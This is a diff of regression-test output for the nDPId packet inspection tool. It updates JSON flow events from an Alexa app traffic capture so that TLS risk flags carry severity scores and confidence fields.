-00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2913,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196016,"flow_last_seen":1490976196079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976196079,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2929,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976196016,"flow_last_seen":1490976196143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976196143,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
-00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976071237,"flow_last_seen":1490976075957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2126,"flow_avg_l4_payload_len":212,"midstream":0,"ts_msec":1490976196171,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
-00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976076275,"flow_last_seen":1490976077663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2126,"flow_avg_l4_payload_len":212,"midstream":0,"ts_msec":1490976196171,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
+00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2913,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196016,"flow_last_seen":1490976196079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976196079,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01100{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2929,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976196016,"flow_last_seen":1490976196143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976196143,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
+00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976071237,"flow_last_seen":1490976075957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2126,"flow_avg_l4_payload_len":212,"midstream":0,"ts_msec":1490976196171,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
+00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976076275,"flow_last_seen":1490976077663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2126,"flow_avg_l4_payload_len":212,"midstream":0,"ts_msec":1490976196171,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1490976071286,"flow_last_seen":1490976075975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8626,"flow_avg_l4_payload_len":308,"midstream":0,"ts_msec":1490976196171,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976071306,"flow_last_seen":1490976075950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5104,"flow_avg_l4_payload_len":255,"midstream":0,"ts_msec":1490976196171,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976071306,"flow_last_seen":1490976075950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5104,"flow_avg_l4_payload_len":255,"midstream":0,"ts_msec":1490976196171,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976071349,"flow_last_seen":1490976075957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4754,"flow_avg_l4_payload_len":206,"midstream":0,"ts_msec":1490976196171,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976071380,"flow_last_seen":1490976075949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6831,"flow_avg_l4_payload_len":297,"midstream":0,"ts_msec":1490976196171,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1490976071385,"flow_last_seen":1490976075957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":675,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1490976196171,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -946,83 +946,83 @@
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1490976196223,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976196223,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Y0xAAEAG+qKsECrYNFXRj5ZTAbu3TOm6AAAAAKAC\/\/+mLwAAAgQFtAQCCAoA9or2AAAAAAEDAwg="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2943,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1490976196257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976196257,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqu40VdGPrBAq2AG7llOp3LO0t0zpu6AScSBd6wAAAgQFtAQCCApt5QucAPaK9gEDAwg="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2944,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1490976196259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976196259,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0Y01AAEAG+qmsECrYNFXRj5ZTAbu3TOm7qdyztYAQAVf8fgAAAQEICgD2ivlt5Quc"}
-00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2945,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196223,"flow_last_seen":1490976196261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1490976196261,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2950,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976196223,"flow_last_seen":1490976196300,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1642,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1490976196300,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2952,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976196223,"flow_last_seen":1490976196301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3656,"flow_avg_l4_payload_len":457,"midstream":0,"ts_msec":1490976196301,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}}
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2945,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196223,"flow_last_seen":1490976196261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1490976196261,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01126{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2950,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976196223,"flow_last_seen":1490976196300,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1642,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1490976196300,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01599{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2952,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976196223,"flow_last_seen":1490976196301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3656,"flow_avg_l4_payload_len":457,"midstream":0,"ts_msec":1490976196301,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196840,"flow_last_seen":1490976196840,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1490976196840,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1490976196840,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1490976196840,"pkt":"AMDKkaPvePiC0\/vCCABFAAA\/WmdAAEARM02sECrYrBAqAQqTADUAK8ZJ2BYBAAABAAAAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAE="}
-00745{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196840,"flow_last_seen":1490976196840,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1490976196840,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196840,"flow_last_seen":1490976196840,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1490976196840,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3347,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1490976196938,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"ts_msec":1490976196938,"pkt":"ePiC0\/vCAMDKkaPvCABFAABP7ApAAEARoZmsECoBrBAq2AA1CpMAO2jR2BaBgAABAAEAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAHADAABAAEAAAA7AARIFc55"}
-00759{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3347,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976196840,"flow_last_seen":1490976196938,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976196938,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"72.21.206.121"}}
+00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3347,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976196840,"flow_last_seen":1490976196938,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976196938,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"72.21.206.121"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3351,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196942,"flow_last_seen":1490976196942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976196942,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3351,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1490976196942,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976196942,"pkt":"AMDKkaPvePiC0\/vCCABFAAA85QlAAEAGaDusECrYSBXOebn1AbuZi243AAAAAKAC\/\/8K4AAAAgQFtAQCCAoA9os+AAAAAAEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3353,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":1490976197023,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976197023,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwSYFAAOcGXM9IFc55rBAq2AG7ufUB00CKmYtuOHASH\/5wwgAAAgQFtAEDAwY="}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3354,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":3,"flow_last_seen":1490976197024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976197024,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo5QpAAEAGaE6sECrYSBXOebn1AbuZi244AdNAi1AQAVe7MwAA"}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3355,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196942,"flow_last_seen":1490976197026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976197026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
